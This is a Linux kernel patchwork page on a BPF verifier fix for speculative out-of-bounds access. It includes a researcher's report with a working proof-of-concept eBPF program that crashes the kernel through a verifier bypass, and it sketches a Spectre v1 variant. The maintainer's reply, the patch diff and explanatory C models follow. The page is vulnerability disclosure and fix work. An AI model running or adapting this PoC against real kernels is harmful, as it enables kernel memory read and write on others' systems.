Message ID:   20190102235835.3311-9-daniel@iogearbox.net
State:        Accepted
Delegated to: BPF Maintainers
Series:       bpf fix to prevent oob under speculation
Hi!

Sorry about the extremely slow reply, I was on vacation over the
holidays and only got back today.

On Thu, Jan 3, 2019 at 12:58 AM Daniel Borkmann <daniel@iogearbox.net> wrote:
> Jann reported that the original commit back in b2157399cc98
> ("bpf: prevent out-of-bounds speculation") was not sufficient
> to stop CPU from speculating out of bounds memory access:
> While b2157399cc98 only focussed on masking array map access
> for unprivileged users for tail calls and data access such
> that the user provided index gets sanitized from BPF program
> and syscall side, there is still a more generic form affected
> from BPF programs that applies to most maps that hold user
> data in relation to dynamic map access when dealing with
> unknown scalars or "slow" known scalars as access offset, for
> example:
[...]
> +static int sanitize_ptr_alu(struct bpf_verifier_env *env,
> +			    struct bpf_insn *insn,
> +			    const struct bpf_reg_state *ptr_reg,
> +			    struct bpf_reg_state *dst_reg,
> +			    bool off_is_neg)
> +{
[...]
> +
> +	/* If we arrived here from different branches with different
> +	 * limits to sanitize, then this won't work.
> +	 */
> +	if (aux->alu_state &&
> +	    (aux->alu_state != alu_state ||
> +	     aux->alu_limit != alu_limit))
> +		return -EACCES;

This code path doesn't get triggered in the case where the same
ALU_ADD64 instruction is used for both "ptr += reg" and
"numeric_reg += reg". This leads to kernel read/write because the
code intended to ensure safety of the "ptr += reg" case in
speculative execution ends up clobbering the addend in the
"numeric_reg += reg" case:

source code:
=============
int main(void) {
  int my_map = array_create(8, 30);
  array_set(my_map, 0, 1);
  struct bpf_insn insns[] = {
    // load map value pointer into r0 and r2
    BPF_LD_MAP_FD(BPF_REG_ARG1, my_map),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -16),
    BPF_ST_MEM(BPF_DW, BPF_REG_FP, -16, 0),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),

    // load some number from the map into r1
    BPF_LDX_MEM(BPF_B, BPF_REG_1, BPF_REG_0, 0),

    // depending on R1, branch:
    BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 3),

    // branch A
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
    BPF_MOV64_IMM(BPF_REG_3, 0),
    BPF_JMP_A(2),

    // branch B
    BPF_MOV64_IMM(BPF_REG_2, 0),
    BPF_MOV64_IMM(BPF_REG_3, 0x100000),

    // *** COMMON INSTRUCTION ***
    BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_3),

    // depending on R1, branch:
    BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1),

    // branch A
    BPF_JMP_A(4),

    // branch B
    BPF_MOV64_IMM(BPF_REG_0, 0x13371337),
    // verifier-confused branch: verifier follows fall-through,
    // runtime follows jump
    BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0x100000, 2),
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),

    // fake-dead code; targeted from branch A to prevent dead code sanitization
    BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_0, 0),
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN()
  };
  int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));
  trigger_proc(sock_fd);
}
=============

verifier output:
=============
0: (18) r1 = 0x0
2: (bf) r2 = r10
3: (07) r2 += -16
4: (7a) *(u64 *)(r10 -16) = 0
5: (85) call bpf_map_lookup_elem#1
6: (55) if r0 != 0x0 goto pc+1
 R0=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
7: (95) exit

from 6 to 8: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm
8: (71) r1 = *(u8 *)(r0 +0)
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm
9: (55) if r1 != 0x0 goto pc+3
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
10: (bf) r2 = r0
11: (b7) r3 = 0
12: (05) goto pc+2
15: (0f) r2 += r3
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3_w=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
16: (55) if r1 != 0x0 goto pc+1
17: (05) goto pc+4
22: (71) r0 = *(u8 *)(r0 +0)
 R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
23: (b7) r0 = 0
24: (95) exit

from 15 to 16 (speculative execution): safe

from 9 to 13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R10=fp0,call_-1 fp-16=mmmmmmmm
13: (b7) r2 = 0
14: (b7) r3 = 1048576
15: (0f) r2 += r3
16: (55) if r1 != 0x0 goto pc+1
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=inv1048576 R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
17: (05) goto pc+4
22: safe

from 16 to 18: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R2=inv1048576 R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
18: (b7) r0 = 322376503
19: (55) if r2 != 0x100000 goto pc+2
20: (b7) r0 = 0
21: (95) exit
processed 29 insns (limit 131072), stack depth 16
=============

dmesg:
=============
[ 9948.417809] flen=38 proglen=205 pass=5 image=0000000039846164 from=test pid=2185
[ 9948.421291] JIT code: 00000000: 55 48 89 e5 48 81 ec 38 00 00 00 48 83 ed 28 48
[ 9948.424560] JIT code: 00000010: 89 5d 00 4c 89 6d 08 4c 89 75 10 4c 89 7d 18 31
[ 9948.428734] JIT code: 00000020: c0 48 89 45 20 48 bf 88 43 c3 da 81 88 ff ff 48
[ 9948.433479] JIT code: 00000030: 89 ee 48 83 c6 f0 48 c7 45 f0 00 00 00 00 48 81
[ 9948.437504] JIT code: 00000040: c7 d0 00 00 00 8b 46 00 48 83 f8 1e 73 0c 83 e0
[ 9948.443528] JIT code: 00000050: 1f 48 c1 e0 03 48 01 f8 eb 02 31 c0 48 83 f8 00
[ 9948.447364] JIT code: 00000060: 75 16 48 8b 5d 00 4c 8b 6d 08 4c 8b 75 10 4c 8b
[ 9948.451079] JIT code: 00000070: 7d 18 48 83 c5 28 c9 c3 48 0f b6 78 00 48 83 ff
[ 9948.454900] JIT code: 00000080: 00 75 07 48 89 c6 31 d2 eb 07 31 f6 ba 00 00 10
[ 9948.459435] JIT code: 00000090: 00 41 ba 07 00 00 00 49 29 d2 49 09 d2 49 f7 da
[ 9948.466041] JIT code: 000000a0: 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83 ff 00 75 02
[ 9948.470384] JIT code: 000000b0: eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04
[ 9948.474085] JIT code: 000000c0: 31 c0 eb 9e 48 0f b6 40 00 31 c0 eb 95
[ 9948.478102] BUG: unable to handle kernel paging request at 0000000013371337
[ 9948.481562] #PF error: [normal kernel read fault]
[ 9948.483878] PGD 0 P4D 0
[ 9948.485139] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN
[ 9948.487945] CPU: 5 PID: 2185 Comm: test Not tainted 4.20.0+ #225
[ 9948.490864] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
[ 9948.494912] RIP: 0010:0xffffffffc01602f3
[ 9948.497212] Code: 49 09 d2 49 f7 da 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83 ff 00 75 02 eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 31 c0 eb 9e <48> 0f b6 40 00 31 c0 eb 95 cc cc cc cc cc cc cc cc cc cc cc cc cc
[ 9948.506340] RSP: 0018:ffff8881e473f968 EFLAGS: 00010287
[ 9948.508857] RAX: 0000000013371337 RBX: ffff8881e8f01e40 RCX: ffffffff9388f848
[ 9948.512263] RDX: 0000000000100000 RSI: 0000000000000000 RDI: 0000000000000001
[ 9948.515653] RBP: ffff8881e473f978 R08: ffffed103b747002 R09: ffffed103b747002
[ 9948.519056] R10: 0000000000000000 R11: ffffed103b747001 R12: 0000000000000000
[ 9948.522452] R13: 0000000000000001 R14: ffff8881e2718600 R15: ffffc90001572000
[ 9948.525840] FS:  00007f2ad28ad700(0000) GS:ffff8881eb140000(0000) knlGS:0000000000000000
[ 9948.529708] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 9948.532450] CR2: 0000000013371337 CR3: 00000001e76c5004 CR4: 00000000003606e0
[ 9948.535834] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 9948.539217] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 9948.542581] Call Trace:
[ 9948.543760]  ? sk_filter_trim_cap+0x148/0x2d0
[ 9948.545847]  ? sk_reuseport_is_valid_access+0xa0/0xa0
[ 9948.548249]  ? skb_copy_datagram_from_iter+0x6e/0x280
[ 9948.550655]  ? _raw_spin_unlock+0x16/0x30
[ 9948.552581]  ? deactivate_slab.isra.68+0x59d/0x600
[ 9948.554866]  ? unix_scm_to_skb+0xd1/0x230
[ 9948.556780]  ? unix_dgram_sendmsg+0x312/0x940
[ 9948.558856]  ? unix_stream_connect+0x980/0x980
[ 9948.560986]  ? aa_sk_perm+0x10c/0x3f0
[ 9948.563123]  ? kasan_unpoison_shadow+0x35/0x40
[ 9948.565107]  ? aa_af_perm+0x1e0/0x1e0
[ 9948.566608]  ? kasan_unpoison_shadow+0x35/0x40
[ 9948.568463]  ? unix_stream_connect+0x980/0x980
[ 9948.570397]  ? sock_sendmsg+0x6d/0x80
[ 9948.571948]  ? sock_write_iter+0x121/0x1c0
[ 9948.573678]  ? sock_sendmsg+0x80/0x80
[ 9948.575258]  ? sock_enable_timestamp+0x60/0x60
[ 9948.576958]  ? iov_iter_init+0x86/0xc0
[ 9948.578395]  ? __vfs_write+0x294/0x3b0
[ 9948.579782]  ? kernel_read+0xa0/0xa0
[ 9948.581152]  ? apparmor_task_setrlimit+0x330/0x330
[ 9948.582919]  ? vfs_write+0xe7/0x230
[ 9948.584228]  ? ksys_write+0xa1/0x120
[ 9948.585559]  ? __ia32_sys_read+0x50/0x50
[ 9948.587174]  ? do_syscall_64+0x73/0x160
[ 9948.588872]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 9948.591134] Modules linked in: btrfs xor zstd_compress raid6_pq
[ 9948.593654] CR2: 0000000013371337
[ 9948.595078] ---[ end trace cea5ab7027131bf2 ]---
=============

Aside from that, I also think that the pruning of "dead code" probably
still permits v1 speculative execution attacks when code vaguely like
the following is encountered, if it is possible to convince the CPU to
mispredict the second branch, but I haven't tested that so far:

R0 = <slow map value, known to be 0>;
R1 = <fast map value>;
if (R1 != R0) { // mispredicted
  return 0;
}
R3 = <a map value pointer>;
R2 = <arbitrary 64-bit number>;
if (R1 == 0) { // architecturally always taken, verifier prunes other branch
  R2 = <a map value pointer>;
}
access R3[R2[0] & 1];

To convince the CPU to predict the second branch the way you want, you
could probably add another code path that jumps in front of the branch
with both R2 and R3 already containing valid pointers. Something like
this:

if (<some map value>) {
  R0 = <slow map value, known to be 0>;
  R1 = <fast map value>;
  if (R1 != R0) { // mispredicted
    return 0;
  }
  R3 = <a map value pointer>;
  R2 = <arbitrary 64-bit number>;
} else {
  R3 = <a map value pointer>;
  R2 = <arbitrary 64-bit number>;
  R1 = 1;
}
if (R1 == 0) { // architecturally always taken, verifier prunes other branch
  R2 = <a map value pointer>;
}
access R3[R2[0] & 1];
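The clobbering described above is easiest to see in isolation. Below is a
minimal userspace C model of the masking sequence that the patch's
fixup_bpf_calls() emits in front of the shared ALU_ADD64; mask_off and the
test harness are illustrative names, not kernel code, and alu_limit = 8 is
assumed, matching the 8-byte map value from branch A of the PoC:

=============
#include <stdint.h>
#include <stdio.h>

/* Userspace model of the instruction sequence patched in for
 * "dst += off"; AX plays the role of BPF_REG_AX.
 */
static uint64_t mask_off(uint64_t off, uint32_t alu_limit)
{
	uint64_t ax = alu_limit - 1;            /* BPF_MOV32_IMM(AX, limit - 1)    */

	ax -= off;                              /* BPF_ALU64_REG(BPF_SUB, AX, off) */
	ax |= off;                              /* BPF_ALU64_REG(BPF_OR,  AX, off) */
	ax = -ax;                               /* BPF_ALU64_IMM(BPF_NEG, AX, 0)   */
	ax = (uint64_t)((int64_t)ax >> 63);     /* BPF_ALU64_IMM(BPF_ARSH, AX, 63):
	                                         * all-ones iff off < alu_limit    */
	return ax & off;                        /* off if in range, else 0         */
}

int main(void)
{
	printf("%#llx\n", (unsigned long long)mask_off(3, 8));        /* 0x3: in range */
	printf("%#llx\n", (unsigned long long)mask_off(0x100000, 8)); /* 0: clamped    */
	return 0;
}
=============

With alu_limit taken from branch A's pointer, branch B's addend 0x100000 is
clamped to 0 at runtime, r2 stays 0 instead of 0x100000, and the jump at
insn 19 that the verifier proved dead is taken, dereferencing
r0 = 0x13371337, the address seen in the oops above.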
Hi Jann,

On 01/03/2019 10:13 PM, Jann Horn wrote:
> Sorry about the extremely slow reply, I was on vacation over the
> holidays and only got back today.
[...]
> This code path doesn't get triggered in the case where the same
> ALU_ADD64 instruction is used for both "ptr += reg" and
> "numeric_reg += reg". This leads to kernel read/write because the
> code intended to ensure safety of the "ptr += reg" case in
> speculative execution ends up clobbering the addend in the
> "numeric_reg += reg" case:
[...]

Good point, thanks for catching this scenario! I'll get this fixed
in order to reject such programs.

> Aside from that, I also think that the pruning of "dead code" probably
> still permits v1 speculative execution attacks when code vaguely like
> the following is encountered, if it is possible to convince the CPU to
> mispredict the second branch, but I haven't tested that so far:
[...]

Thanks, I'll look into evaluating this case as well after the fix.

Best,
Daniel
diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
index 3f84f3e..27b7494 100644
--- a/include/linux/bpf_verifier.h
+++ b/include/linux/bpf_verifier.h
@@ -148,6 +148,7 @@ struct bpf_verifier_state {
 	/* call stack tracking */
 	struct bpf_func_state *frame[MAX_CALL_FRAMES];
 	u32 curframe;
+	bool speculative;
 };
 
 #define bpf_get_spilled_reg(slot, frame)				\
@@ -167,15 +168,24 @@ struct bpf_verifier_state_list {
 	struct bpf_verifier_state_list *next;
 };
 
+/* Possible states for alu_state member. */
+#define BPF_ALU_SANITIZE_SRC	1U
+#define BPF_ALU_SANITIZE_DST	2U
+#define BPF_ALU_NEG_VALUE	(1U << 2)
+#define BPF_ALU_SANITIZE	(BPF_ALU_SANITIZE_SRC | \
+				 BPF_ALU_SANITIZE_DST)
+
 struct bpf_insn_aux_data {
 	union {
 		enum bpf_reg_type ptr_type;	/* pointer type for load/store insns */
 		unsigned long map_state;	/* pointer/poison value for maps */
 		s32 call_imm;			/* saved imm field of call insn */
+		u32 alu_limit;			/* limit for add/sub register with pointer */
 	};
 	int ctx_field_size; /* the ctx field size for load insn, maybe 0 */
 	int sanitize_stack_off; /* stack slot to be cleared */
 	bool seen; /* this insn was processed by the verifier */
+	u8 alu_state; /* used in combination with alu_limit */
 };
 
 #define MAX_USED_MAPS 64 /* max number of maps accessed by one eBPF program */
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 8e5da1c..f6bc62a 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -710,6 +710,7 @@ static int copy_verifier_state(struct bpf_verifier_state *dst_state,
 		free_func_state(dst_state->frame[i]);
 		dst_state->frame[i] = NULL;
 	}
+	dst_state->speculative = src->speculative;
 	dst_state->curframe = src->curframe;
 	for (i = 0; i <= src->curframe; i++) {
 		dst = dst_state->frame[i];
@@ -754,7 +755,8 @@ static int pop_stack(struct bpf_verifier_env *env, int *prev_insn_idx,
 }
 
 static struct bpf_verifier_state *push_stack(struct bpf_verifier_env *env,
-					     int insn_idx, int prev_insn_idx)
+					     int insn_idx, int prev_insn_idx,
+					     bool speculative)
 {
 	struct bpf_verifier_state *cur = env->cur_state;
 	struct bpf_verifier_stack_elem *elem;
@@ -772,6 +774,7 @@ static struct bpf_verifier_state *push_stack(struct bpf_verifier_env *env,
 	err = copy_verifier_state(&elem->st, cur);
 	if (err)
 		goto err;
+	elem->st.speculative |= speculative;
 	if (env->stack_size > BPF_COMPLEXITY_LIMIT_STACK) {
 		verbose(env, "BPF program is too complex\n");
 		goto err;
@@ -3067,6 +3070,102 @@ static bool check_reg_sane_offset(struct bpf_verifier_env *env,
 	return true;
 }
 
+static struct bpf_insn_aux_data *cur_aux(struct bpf_verifier_env *env)
+{
+	return &env->insn_aux_data[env->insn_idx];
+}
+
+static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,
+			      u32 *ptr_limit, u8 opcode, bool off_is_neg)
+{
+	bool mask_to_left = (opcode == BPF_ADD &&  off_is_neg) ||
+			    (opcode == BPF_SUB && !off_is_neg);
+	u32 off;
+
+	switch (ptr_reg->type) {
+	case PTR_TO_STACK:
+		off = ptr_reg->off + ptr_reg->var_off.value;
+		if (mask_to_left)
+			*ptr_limit = MAX_BPF_STACK + off;
+		else
+			*ptr_limit = -off;
+		return 0;
+	case PTR_TO_MAP_VALUE:
+		if (mask_to_left) {
+			*ptr_limit = ptr_reg->umax_value + ptr_reg->off;
+		} else {
+			off = ptr_reg->smin_value + ptr_reg->off;
+			*ptr_limit = ptr_reg->map_ptr->value_size - off;
+		}
+		return 0;
+	default:
+		return -EINVAL;
+	}
+}
+
+static int sanitize_ptr_alu(struct bpf_verifier_env *env,
+			    struct bpf_insn *insn,
+			    const struct bpf_reg_state *ptr_reg,
+			    struct bpf_reg_state *dst_reg,
+			    bool off_is_neg)
+{
+	struct bpf_verifier_state *vstate = env->cur_state;
+	struct bpf_insn_aux_data *aux = cur_aux(env);
+	bool ptr_is_dst_reg = ptr_reg == dst_reg;
+	u8 opcode = BPF_OP(insn->code);
+	u32 alu_state, alu_limit;
+	struct bpf_reg_state tmp;
+	bool ret;
+
+	if (env->allow_ptr_leaks || BPF_SRC(insn->code) == BPF_K)
+		return 0;
+
+	/* We already marked aux for masking from non-speculative
+	 * paths, thus we got here in the first place. We only care
+	 * to explore bad access from here.
+	 */
+	if (vstate->speculative)
+		goto do_sim;
+
+	alu_state  = off_is_neg ? BPF_ALU_NEG_VALUE : 0;
+	alu_state |= ptr_is_dst_reg ?
+		     BPF_ALU_SANITIZE_SRC : BPF_ALU_SANITIZE_DST;
+
+	if (retrieve_ptr_limit(ptr_reg, &alu_limit, opcode, off_is_neg))
+		return 0;
+
+	/* If we arrived here from different branches with different
+	 * limits to sanitize, then this won't work.
+	 */
+	if (aux->alu_state &&
+	    (aux->alu_state != alu_state ||
+	     aux->alu_limit != alu_limit))
+		return -EACCES;
+
+	/* Corresponding fixup done in fixup_bpf_calls(). */
+	aux->alu_state = alu_state;
+	aux->alu_limit = alu_limit;
+
+do_sim:
+	/* Simulate and find potential out-of-bounds access under
+	 * speculative execution from truncation as a result of
+	 * masking when off was not within expected range. If off
+	 * sits in dst, then we temporarily need to move ptr there
+	 * to simulate dst (== 0) +/-= ptr. Needed, for example,
+	 * for cases where we use K-based arithmetic in one direction
+	 * and truncated reg-based in the other in order to explore
+	 * bad access.
+	 */
+	if (!ptr_is_dst_reg) {
+		tmp = *dst_reg;
+		*dst_reg = *ptr_reg;
+	}
+	ret = push_stack(env, env->insn_idx + 1, env->insn_idx, true);
+	if (!ptr_is_dst_reg)
+		*dst_reg = tmp;
+	return !ret ? -EFAULT : 0;
+}
+
 /* Handles arithmetic on a pointer and a scalar: computes new min/max and var_off.
  * Caller should also handle BPF_MOV case separately.
  * If we return -EACCES, caller may want to try again treating pointer as a
@@ -3087,6 +3186,7 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
 	    umin_ptr = ptr_reg->umin_value, umax_ptr = ptr_reg->umax_value;
 	u32 dst = insn->dst_reg, src = insn->src_reg;
 	u8 opcode = BPF_OP(insn->code);
+	int ret;
 
 	dst_reg = &regs[dst];
 
@@ -3142,6 +3242,11 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
 
 	switch (opcode) {
 	case BPF_ADD:
+		ret = sanitize_ptr_alu(env, insn, ptr_reg, dst_reg, smin_val < 0);
+		if (ret < 0) {
+			verbose(env, "R%d tried to add from different maps or paths\n", dst);
+			return ret;
+		}
 		/* We can take a fixed offset as long as it doesn't overflow
 		 * the s32 'off' field
 		 */
@@ -3192,6 +3297,11 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
 		}
 		break;
 	case BPF_SUB:
+		ret = sanitize_ptr_alu(env, insn, ptr_reg, dst_reg, smin_val < 0);
+		if (ret < 0) {
+			verbose(env, "R%d tried to sub from different maps or paths\n", dst);
+			return ret;
+		}
 		if (dst_reg == off_reg) {
 			/* scalar -= pointer.  Creates an unknown scalar */
 			verbose(env, "R%d tried to subtract pointer from scalar\n",
@@ -4389,7 +4499,8 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env,
 		}
 	}
 
-	other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
+	other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx,
+				  false);
 	if (!other_branch)
 		return -EFAULT;
 	other_branch_regs = other_branch->frame[other_branch->curframe]->regs;
@@ -5499,6 +5610,12 @@ static bool states_equal(struct bpf_verifier_env *env,
 	if (old->curframe != cur->curframe)
 		return false;
 
+	/* Verification state from speculative execution simulation
+	 * must never prune a non-speculative execution one.
+	 */
+	if (old->speculative && !cur->speculative)
+		return false;
+
 	/* for states to be equal callsites have to be the same
 	 * and all frame states need to be equivalent
 	 */
@@ -5700,6 +5817,7 @@ static int do_check(struct bpf_verifier_env *env)
 	if (!state)
 		return -ENOMEM;
 	state->curframe = 0;
+	state->speculative = false;
 	state->frame[0] = kzalloc(sizeof(struct bpf_func_state), GFP_KERNEL);
 	if (!state->frame[0]) {
 		kfree(state);
@@ -5739,8 +5857,10 @@ static int do_check(struct bpf_verifier_env *env)
 			/* found equivalent state, can prune the search */
 			if (env->log.level) {
 				if (do_print_state)
-					verbose(env, "\nfrom %d to %d: safe\n",
-						env->prev_insn_idx, env->insn_idx);
+					verbose(env, "\nfrom %d to %d%s: safe\n",
+						env->prev_insn_idx, env->insn_idx,
+						env->cur_state->speculative ?
+						" (speculative execution)" : "");
 				else
 					verbose(env, "%d: safe\n", env->insn_idx);
 			}
@@ -5757,8 +5877,10 @@ static int do_check(struct bpf_verifier_env *env)
 			if (env->log.level > 1)
 				verbose(env, "%d:", env->insn_idx);
 			else
-				verbose(env, "\nfrom %d to %d:",
-					env->prev_insn_idx, env->insn_idx);
+				verbose(env, "\nfrom %d to %d%s:",
+					env->prev_insn_idx, env->insn_idx,
+					env->cur_state->speculative ?
+					" (speculative execution)" : "");
 			print_verifier_state(env, state->frame[state->curframe]);
 			do_print_state = false;
 		}
@@ -6750,6 +6872,57 @@ static int fixup_bpf_calls(struct bpf_verifier_env *env)
 			continue;
 		}
 
+		if (insn->code == (BPF_ALU64 | BPF_ADD | BPF_X) ||
+		    insn->code == (BPF_ALU64 | BPF_SUB | BPF_X)) {
+			const u8 code_add = BPF_ALU64 | BPF_ADD | BPF_X;
+			const u8 code_sub = BPF_ALU64 | BPF_SUB | BPF_X;
+			struct bpf_insn insn_buf[16];
+			struct bpf_insn *patch = &insn_buf[0];
+			bool issrc, isneg;
+			u32 off_reg;
+
+			aux = &env->insn_aux_data[i + delta];
+			if (!aux->alu_state)
+				continue;
+
+			isneg = aux->alu_state & BPF_ALU_NEG_VALUE;
+			issrc = (aux->alu_state & BPF_ALU_SANITIZE) ==
+				BPF_ALU_SANITIZE_SRC;
+
+			off_reg = issrc ? insn->src_reg : insn->dst_reg;
+			if (isneg)
+				*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);
+			*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);
+			*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
+			*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
+			*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
+			*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
+			if (issrc) {
+				*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX,
+							 off_reg);
+				insn->src_reg = BPF_REG_AX;
+			} else {
+				*patch++ = BPF_ALU64_REG(BPF_AND, off_reg,
+							 BPF_REG_AX);
+			}
+			if (isneg)
+				insn->code = insn->code == code_add ?
					     code_sub : code_add;
+			*patch++ = *insn;
+			if (issrc && isneg)
+				*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);
+			cnt = patch - insn_buf;
+
+			new_prog = bpf_patch_insn_data(env, i + delta, insn_buf, cnt);
+			if (!new_prog)
+				return -ENOMEM;
+
+			delta    += cnt - 1;
+			env->prog = prog = new_prog;
+			insn      = new_prog->insnsi + i + delta;
+			continue;
+		}
+
 		if (insn->code != (BPF_JMP | BPF_CALL))
 			continue;
 		if (insn->src_reg == BPF_PSEUDO_CALL)
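For context on where alu_limit comes from, here is a simplified userspace
model of the PTR_TO_MAP_VALUE case of retrieve_ptr_limit() from the patch
above; map_value_limit is an illustrative name, not a kernel function:

=============
#include <stdint.h>
#include <stdio.h>

/* The limit is how far the variable offset may move the pointer, in
 * the direction the masking has to cover, without leaving the map
 * value.
 */
static uint32_t map_value_limit(uint32_t value_size, int32_t ptr_off,
                                uint64_t umax_value, int64_t smin_value,
                                int mask_to_left)
{
	if (mask_to_left)
		/* Largest offset that may already have been added. */
		return umax_value + ptr_off;
	/* Room that remains up to the end of the map value. */
	return value_size - (smin_value + ptr_off);
}

int main(void)
{
	/* The PoC's map value is 8 bytes and the pointer sits at
	 * offset 0 with no variable part yet, so alu_limit is 8 and
	 * the emitted masking only admits offsets in [0, 7].
	 */
	printf("alu_limit = %u\n", map_value_limit(8, 0, 0, 0, 0));
	return 0;
}
=============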